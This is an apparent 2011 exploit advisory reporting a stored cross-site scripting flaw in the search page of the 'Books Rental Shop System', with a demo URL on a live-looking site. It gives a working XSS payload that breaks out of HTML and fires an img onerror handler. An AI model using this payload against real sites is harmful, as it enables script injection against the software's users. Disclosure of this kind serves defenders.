# Exploit Title: Books Rental Shop System Stored XSS
# Date: 2011
# Author: Eyup CELIK
# Version: All Version
# Tested on: All versions are Vulnerability

ISSUE

Cross Site Scripting can be done using the command input

Vulnerable Page:
index.php (Search Modules)

Example:
index.php?view=search

Exploit:
"/></a></><img src=1.gif onerror=alert(1)>

Demo:
http://books.commodityrentals.com/version-2/index.php?view=search


Thanks,


Eyup CELIK
Bilgi Teknolojileri Güvenlik Uzmani
http://www.eyupcelik.com.tr